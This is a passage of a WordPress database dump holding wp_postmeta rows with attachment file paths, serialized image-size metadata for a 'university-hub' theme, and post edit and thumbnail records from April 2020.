(24824, 10041, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:13:\"2020/04/6.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"6-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"6-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24825, 10042, '_wp_attached_file', '2020/04/10.jpg'),
(24826, 10042, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"10-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"10-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24827, 10043, '_wp_attached_file', '2020/04/11.jpg'),
(24828, 10043, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"11-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"11-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24829, 10044, '_wp_attached_file', '2020/04/12.jpg'),
(24830, 10044, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"12-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"12-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24831, 10045, '_wp_attached_file', '2020/04/13.jpg'),
(24832, 10045, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"13-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"13-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24833, 10046, '_wp_attached_file', '2020/04/14.jpg'),
(24834, 10046, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"14-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"14-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24835, 10047, '_wp_attached_file', '2020/04/15.jpg'),
(24836, 10047, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/15.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"15-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"15-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24837, 10048, '_wp_attached_file', '2020/04/16.jpg'),
(24838, 10048, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:14:\"2020/04/16.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"16-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"16-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"16-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24839, 10049, '_wp_attached_file', '2020/04/17.jpg'),
(24840, 10049, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"17-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"17-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24841, 10050, '_wp_attached_file', '2020/04/18.jpg'),
(24842, 10050, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2020/04/18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"18-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"18-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24843, 10051, '_wp_attached_file', '2020/04/90148413_1052086805167507_6351566111711952896_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(24844, 10051, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2020/04/90148413_1052086805167507_6351566111711952896_o.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"90148413_1052086805167507_6351566111711952896_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"90148413_1052086805167507_6351566111711952896_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"90148413_1052086805167507_6351566111711952896_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24845, 10052, '_wp_attached_file', '2020/04/90669280_1058435511199303_4622931595723014144_o.jpg'),
(24846, 10052, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2020/04/90669280_1058435511199303_4622931595723014144_o.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"90669280_1058435511199303_4622931595723014144_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"90669280_1058435511199303_4622931595723014144_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"90669280_1058435511199303_4622931595723014144_o-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24847, 10039, '_edit_last', '14'),
(24848, 10053, '_wp_attached_file', '2020/04/5-1.jpg'),
(24849, 10053, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:15:\"2020/04/5-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"5-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"5-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24850, 10039, '_thumbnail_id', '10040'),
(24853, 10039, '_hide_featured', NULL),
(24854, 10055, '_edit_lock', '1587401391:14'),
(24855, 10055, '_edit_last', '14'),
(24856, 10055, '_thumbnail_id', '10041'),
(24859, 10055, '_hide_featured', NULL),
(24860, 10057, '_edit_lock', '1587401569:14'),
(24861, 10057, '_edit_last', '14'),
(24862, 10057, '_thumbnail_id', '10042'),
(24865, 10057, '_hide_featured', NULL),
(24866, 10059, '_edit_lock', '1587401738:14'),
(24867, 10059, '_edit_last', '14'),
(24868, 10059, '_thumbnail_id', '10043'),
(24871, 10059, '_hide_featured', NULL),
(24872, 10061, '_edit_lock', '1587401880:14'),
(24873, 10061, '_edit_last', '14'),
(24874, 10061, '_thumbnail_id', '10044'),
(24877, 10061, '_hide_featured', NULL),
(24878, 10061, '_wp_old_date', '2020-04-20'),
(24879, 10063, '_edit_lock', '1587402057:14'),
(24880, 10063, '_edit_last', '14'),
(24881, 10063, '_hide_featured', NULL),
(24882, 10063, '_thumbnail_id', '10045'),
(24885, 10066, '_edit_lock', '1587402198:14'),
(24886, 10066, '_edit_last', '14'),
(24887, 10066, '_thumbnail_id', '10046'),
(24890, 10066, '_hide_featured', NULL),
(24891, 10068, '_edit_lock', '1587402370:14'),
(24892, 10068, '_edit_last', '14'),
(24893, 10068, '_thumbnail_id', '10047'),
(24896, 10068, '_hide_featured', NULL),
(24897, 10070, '_edit_lock', '1587402464:14'),
(24898, 10070, '_edit_last', '14'),
(24899, 10070, '_thumbnail_id', '10048'),
(24902, 10070, '_hide_featured', NULL),
(24903, 10072, '_edit_lock', '1587402595:14'),
(24904, 10072, '_edit_last', '14'),
(24905, 10072, '_thumbnail_id', '10049'),
(24908, 10072, '_hide_featured', NULL),
(24911, 10074, '_edit_lock', '1587402867:14'),
(24912, 10074, '_edit_last', '14'),
(24913, 10074, '_thumbnail_id', '10050'),
(24916, 10074, '_hide_featured', NULL),
(24919, 10076, '_edit_lock', '1587402979:14'),
(24920, 10076, '_edit_last', '14'),
(24921, 10076, '_thumbnail_id', '10051'),
(24924, 10076, '_hide_featured', NULL),
(24925, 10078, '_edit_lock', '1587403171:14'),
(24926, 10078, '_edit_last', '14'),
(24927, 10078, '_hide_featured', NULL),
(24928, 10078, '_thumbnail_id', '10052'),
(24931, 10081, '_edit_lock', '1587403840:14'),
(24932, 10082, '_wp_attached_file', '2020/04/1.jpg'),
(24933, 10082, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2020/04/1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24934, 10083, '_wp_attached_file', '2020/04/2.jpg'),
(24935, 10083, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2020/04/2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24936, 10084, '_wp_attached_file', '2020/04/3.jpg'),
(24937, 10084, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2020/04/3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24938, 10085, '_wp_attached_file', '2020/04/8.jpg'),
(24939, 10085, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2020/04/8.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"8-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"8-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"8-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"8-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(24940, 10081, '_edit_last', '14'),
(24941, 10081, '_thumbnail_id', '10085'),
(24944, 10081, '_hide_featured', NULL),
(24948, 10088, '_edit_lock', '1587403918:14'),
(24949, 10088, '_edit_last', '14'),
(24950, 10088, '_thumbnail_id', '10084'),
(24953, 10088, '_hide_featured', NULL),
(24954, 10090, '_edit_lock', '1587404014:14'),
(24955, 10090, '_edit_last', '14'),
(24956, 10090, '_thumbnail_id', '10083'),
(24959, 10090, '_hide_featured', NULL),
(24960, 10092, '_edit_lock', '1587404100:14'),
(24961, 10092, '_edit_last', '14'),
(24962, 10092, '_thumbnail_id', '10082'),
(24965, 10092, '_hide_featured', NULL),
(24968, 10099, '_wp_attached_file', '2020/04/21046301.pdf'),
(24969, 10098, '_edit_lock', '1587453265:14'),
(24970, 10100, '_wp_attached_file', '2020/04/21046301-1.pdf'),
(24971, 10098, '_edit_last', '14'),
(24974, 10098, '_hide_featured', NULL),
(24979, 10104, '_wp_attached_file', '2020/04/25046301.jpg'),
(24980, 10104, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1074;s:6:\"height\";i:1524;s:4:\"file\";s:20:\"2020/04/25046301.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25046301-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25046301-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"25046301-768x1090.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25046301-722x1024.jpg\";s:5:\"width\";i:722;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25046301-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1: